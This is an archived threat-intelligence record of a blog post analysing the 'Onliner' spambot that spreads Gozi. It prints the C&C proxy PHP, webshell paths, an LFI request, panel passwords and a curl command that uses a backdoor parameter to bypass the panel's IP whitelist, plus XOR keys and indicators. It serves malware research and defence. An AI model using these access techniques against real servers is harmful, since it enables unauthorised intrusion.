{
	"id": "490da4ed-bd33-4796-b6bc-76e0688107ca",
	"created_at": "2026-04-06T00:12:56.183145Z",
	"updated_at": "2026-04-10T13:12:45.330617Z",
	"deleted_at": null,
	"sha1_hash": "b492b6d6a11c4c698fee9795278f75ee85b508cf",
	"title": "Spambot safari #2 - Online Mail System",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1149656,
	"plain_text": "Spambot safari #2 - Online Mail System\r\nArchived: 2026-04-05 16:42:41 UTC\r\nHey !\r\ntoday I'll present some research around a spambot named \"Onliner\". This spambot is actually used for spreading\r\nGozi.\r\nI've already talk about Onliner in another blogpost but because the spambot quickly evolve, and the botmaster\r\nseems to tries to avoid pwning attempst, I'll try to explain everything here :].\r\nOriginal sample\r\nThe first sample that I've grab come from email, dropped by JSDropper.\r\nA quick dynamic analysis allow us to understand that it's a spambot (a lot of SMTP connections from the\r\nmalicious process).\r\nBefore reversing it, let's look a the CNC communication.\r\nMalware communicates over HTTP. An interesting thing is that the process doesn't contacts directly the CNC, it\r\ntry to contact some proxy web page (PHP script uploaded on compromised websites).\r\nProxy - Good idea - Bad realization\r\nUsing proxy websites is a good idea only if you don't use poor pwned CMS. With poor pwned CMS it take around\r\n3 minutes to anybody to retrieves your real CNC. Example:\r\nI can make some supposition:\r\nIt's pretty sure that the bot master uses a script for updating all the proxies scripts\r\nAll the compromised websites are old: most probable infection vectors are FTP Bruteforce or CMS\r\nexploits\r\nThey have leave a php backdoor somewhere on the compromised website\r\nI have try to found the PHP backdoor for using it to read the PHP proxy code. After some guessing I have saw that\r\nthe PHP backdoor is a WSO webshell, uploaded always in the same locations:\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 1 of 15\n\n/cgi-bin/terms.php\r\n/cgi-bin/useterms.php\r\n/css/terms.php\r\n/css/useterms.php\r\nthe WSO webshell is protected by a poor password -\u003e I can read the PHP proxy code :). The commented version\r\nbelow:\r\n1. \u003c?php\r\n2. $server = 'aHR0cDovLzE5NC4yNDcuMTMuOC9pbWcv'; //http://194.247.13.8/img/\r\n3. if (($_POST[base64_decode('OTk=')]=='')and($_GET[base64_decode('OTk=')]=='')) { exit; } // OTk=99.\r\nIt's a \"security feature\"\r\n4. echo file_get_contents(base64_decode($server).'?'.http_build_query($_GET), false,\r\nstream_context_create(array('http' =\u003e array('method' =\u003e 'POST','header' =\u003e 'Content-type: application/x-www-form-urlencoded','content' =\u003e\r\nhttp_build_query($_POST).'\u0026ip='.$_SERVER['REMOTE_ADDR']))));\r\n5. ?\u003e\r\nThe real CNC is http://194.247.13.8/img/. I'll come back later on the $GET_['99'] / $_POST['99'] parameters,\r\nthose parameters are really interesting in the pwning process :D.\r\nPanel - Good idea - Bad realization\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 2 of 15\n\nFunny, the authentication is not like in others panels.\r\nI don't want to directly use brute force here because like in almost all panels it must have a vulnerability\r\nsomewhere.\r\nCome back to the malware communication. As you can see here, the malware download some dll (ssl and 7zip)\r\nfrom the CNC.\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 3 of 15\n\n1. GET /o17504cxn.php?\u00261001=4\u002699=15\u0026f1=ssleay32.dll HTTP/1.0\r\n2. User-Agent: Download Master\r\n3. Accept: */*\r\n4. Referer: http://ballettschule-nottuln.de/\r\n5. Pragma: no-cache\r\n6. Cache-Control: no-cache\r\n7. Host: ballettschule-nottuln.de\r\nI'm not a good pentester but when you saw a full dll name ssleay32.dll in a GET parameter, it's smell something\r\nbad \\o/.\r\nThanks to that LFI we have access to all the panel (click on image bellow for the full album)\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 4 of 15\n\nAfter looking around, I've found a reference to another IP: 194.247.13.178. This server host another onliner web\r\npanel: hxxp://194.247.13.178/naomi/login.php (click on image bellow for the full album)\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 5 of 15\n\nBy looking at the IP addresses (194.247.13.18 and 194.247.13.178) it seems that those guys really like \"DELTA-X\" hoster (Ukraine).\r\nYou know, for science, I've try to scan 194.247.13.0-255 with Nmap on port 80 + some directory guessing with\r\nPatator.\r\nAnd you know what? It works haha!\r\nI've found another panel at hxxp://194.247.13.196/asus/login.php .\r\nPanel V2 - Good idea - Bad realization\r\nAfter releasing the first blogpost about onliner, the botmaster change some stuff. They start to use IP White listing\r\nfor accessing the panel, they update some code, they don't patch the LFI, they add some others vulns x].\r\nNow, due to IP White listing, when you try to access the web panel, you are kicked by the PHP script:\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 6 of 15\n\nThe LFI is still here so we can look at the code. We can see 4 IPs white listed (Please don't spoil yourself, ignore\r\nthe 2 first foreach haha I'll discuss that below):\r\n1. \u003c?php\r\n2. error_reporting(0);\r\n3.\r\n4.\r\n5.\r\n6. foreach($_POST as $keyD=\u003e$valD){\r\n7. if ($keyD!='edit_file') {\r\n8. if (strpos($valD,\"'\") == true) { exit; }\r\n9. if (strpos($valD,'\"') == true) { exit; }\r\n10. if (strpos($valD,\"--\") == true) { exit; }\r\n11. if (stripos($valD,\"UNION\") == true) { exit; }\r\n12. if (stripos($valD,\"SELECT\") == true) { exit; }\r\n13. }\r\n14. }\r\n15. foreach($_GET as $keyD=\u003e$valD){\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 7 of 15\n\n16. if (strpos($valD,\"'\") == true) { exit; }\r\n17. if (strpos($valD,'\"') == true) { exit; }\r\n18. if (strpos($valD,\"--\") == true) { exit; }\r\n19. if (stripos($valD,\"UNION\") == true) { exit; }\r\n20. if (stripos($valD,\"SELECT\") == true) { exit; }\r\n21. }\r\n22.\r\n23.\r\n24.\r\n25. /* Green IP */\r\n26. $IP[0]=\"95.211.168.97\";\r\n27. $IP[1]=\"163.172.235.143\";\r\n28. $IP[2]=\"66.180.197.197\";\r\n29. $IP[3]=\"91.215.152.113\";\r\n30. $IP[4]=\"1\";\r\n31.\r\n32. /* Database Hostname */\r\n33. $dbhost=\"localhost\";\r\n34.\r\n35. /* Database User */\r\n36. $dbuname=\"root\";\r\n37.\r\n38. /* Database Name */\r\n39. $dbname=\"naomi\";\r\n40.\r\n41. /* Password Database */\r\n42. $dbpass='XXXXXXXXXXX';\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 8 of 15\n\n43.\r\n44. /* Password */\r\n45. $password=\"70183619\";\r\n46.\r\n47. /* Folder */\r\n48. $dir=\"naomi\";\r\n49.\r\n50. /* Spamhaus Check */\r\n51. $SpamhausCheck=\"0\";\r\n52.\r\n53. /* Sorbs Check */\r\n54. $SorbsCheck=\"0\";\r\n55.\r\n56. /* Barracuda Check */\r\n57. $BarracudaCheck=\"0\";\r\n58.\r\n59. $LOG='0';\r\n60. $ip=$_SERVER['REMOTE_ADDR'];\r\n61. include('functions.php');\r\n62.\r\n63. ?\u003e\r\nIt looks bad. I can read the PHP code but I can't access the admin panel. It's time to understand the authentication\r\nprocess. Take a seat, it's wonderfull. This is a big picture of the process:\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 9 of 15\n\nadmin.php:\r\n1. \u003c?php\r\n2. include(\"config.php\");\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 10 of 15\n\n3. include('aut.php');\n4. if ($auth==true) { include('panel.php'); } else {\n5. if ($_GET['pass']=='Lm7%Dv)ko4q') {\n6. include('login.php');\n7. }\n8. }\n9. ?\u003e\nI cannot explain yet what the hell is that\nif ($_GET['pass']=='Lm7%Dv)ko4q') {\ninclude('login.php');\n}\nAnyway, the big picture show us that the situation looks bad, the IP White listing is done early. But the function\nfor IP White listing is in fact... a backdoor \\o/:\n1. ?php\n2. $L=1;\n3. if (($_GET['99']=='')and($_POST['99']=='')) {\n4. if (($IP[0]!='')or($IP[1]!='')or($IP[2]!='')or($IP[3]!='')or($IP[4]!='')) {\n5. if (($IP[0]==$ip)or($IP[1]==$ip)or($IP[2]==$ip)or($IP[3]==$ip)or($IP[4]==$ip)) {\n6. $L=1;\n7. } else {\n8. $L=0;\n9. }\n10. }\n11. if ($L==0) { die('Not Found\n\n12. The requested URL was not found on this server.'); }\n13. $L=0;\n14. }\n15. ?\u003e\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\nPage 11 of 15\n\nRemember the $_GET['99'] in the PHP proxy script ? Look at the script. For bypassing IP White listing when an\r\ninfected bot try to contacts the CNC, they use this parameters $_GET['99'] and $_POST['99'].\r\nI just need the code (in config.php) + set the POST and GET variables and I can access to the CNC from any IPs.\r\ncurl --data \"code=70183619\u002699=backdoor\" \"http://194.247.13.178/naomi/admin.php?99=backdoor\u0026mailer=true\"\r\n\u003e onliner.html\r\nBonus\r\nTo finish, I just want to show you without comment 2 security features used in the Onliner panel.\r\nAnti-SQLi:\r\n1. foreach($_POST as $keyD=\u003e$valD){\r\n2. if ($keyD!='edit_file') {\r\n3. if (strpos($valD,\"'\") == true) { exit; }\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 12 of 15\n\n4. if (strpos($valD,'\"') == true) { exit; }\n5. if (strpos($valD,\"--\") == true) { exit; }\n6. if (stripos($valD,\"UNION\") == true) { exit; }\n7. if (stripos($valD,\"SELECT\") == true) { exit; }\n8. }\n9. }\n10. foreach($_GET as $keyD=\u003e$valD){\n11. if (strpos($valD,\"'\") == true) { exit; }\n12. if (strpos($valD,'\"') == true) { exit; }\n13. if (strpos($valD,\"--\") == true) { exit; }\n14. if (stripos($valD,\"UNION\") == true) { exit; }\n15. if (stripos($valD,\"SELECT\") == true) { exit; }\n16. }\nAnti-... I don't know what:\n1. ?php\n2. if (StrPos($_GET['edit'],'htaccess')\u003e0) {\n3. echo('**Report sent to the administrator  \n4. If there was an attempt to fill the shell, your account will be disabled.**');\n5. exit;\n6. ?\u003e\nMalware binary\nThe malware himself is in fact a dropper. When you run it, it copy itself in C:\\windows\\ and re-run as services.\nThe dropper try to drop 2 dlls:\nhttp://cnc.com/MailerSMTP/dll.dll : the Spam module\nhttp://cnc.com/CheckerSMTP/dll.dll : the SMTP credentials checker module\nThose 2 dll are xored with the key\n[0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42, 0x32, 0x37, 0x39, 0x36, 0x31, 0x43,\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\nPage 13 of 15\n\n0x43, 0x44, 0x41, 0x37, 0x30, 0x43, 0x32, 0x30, 0x39, 0x37, 0x38, 0x32, 0x46, 0x44, 0x44, 0x35, 0x31, 0x34,\r\n0x43, 0x34, 0x36, 0x37, 0x44, 0x37, 0x39, 0x44, 0x30, 0x39, 0x39, 0x33, 0x38, 0x30, 0x33, 0x35, 0x31, 0x39,\r\n0x43, 0x33, 0x32, 0x41, 0x46, 0x37, 0x33, 0x30, 0x34, 0x30, 0x00]\r\nA little schema of the malware communication initialization: (the communication is encoded with base64 with\r\n$_GET parameters)\r\nAll the modules needed are copied in c:\\windows\\ too.\r\nAfter installation, the malware wait for command from the CNC. Here, an example with the CheckerSMTP\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 14 of 15\n\nModule:\r\nThe CNC send the \"control account\", this account (mail+password+smtpserver) is used to be sure that the\r\nspamming process works. Valid SMTP credentials can be sends to this control account to\r\nThe CNC send a file a list of SMTP server + a list of compromised account in 2 zip files. mask.zip and\r\n3746000.zip\r\nThe CNC wait until the bot finish his job and send another list of SMTP+Credentials\r\nThe sample is pretty good detected by AV industry (maybe due to the lot of debug strings present in the binary).\r\nConclusion\r\nAs reminded, this spam bot is used to spread Gozi in Italy and Canada.\r\nOnliner has around 1000 infected bots, they don't spread to much sample of the spambot.\r\nI look forward the next update of the panel.\r\nAnnexe\r\nOnliner known IPs:\r\n194.247.13.8\r\n194.247.13.178\r\n194.247.13.196\r\n91.210.165.163\r\nSpambot sample:\r\n9144917a27453e8d69596a41ea003a5bf7d33334caaa4e67f5f8f9ef9cc3bcd1\r\nB5C87CAB2FF99D1E4B4C3EE897B07869FA8F6A63FBD27018F589C105FAF91FCD\r\nModule samples:\r\n3f28a345393273cab4c6cea060644646bf9d0e5b2ebd7dd0c3935fe696223565\r\nb535d1eec26275fb53561a7dd3c6454b8036176f8fbdd12a64f2ed4defccb618\r\nSource: https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nhttps://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html\r\nPage 15 of 15\n\nhttp://cnc.com/CheckerSMTP/dll.dll Those 2 dll are xored with the key : the SMTP credentials checker module  \n[0x37, 0x32, 0x44, 0x45, 0x34, 0x45, 0x35, 0x33, 0x36, 0x46, 0x35, 0x42, 0x32, 0x37, 0x39, 0x36, 0x31, 0x43,\n   Page 13 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html"
	],
	"report_names": [
		"spambot-safari-2-online-mail-system.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434376,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.pdf",
		"text": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.txt",
		"img": "https://archive.orkl.eu/b492b6d6a11c4c698fee9795278f75ee85b508cf.jpg"
	}
}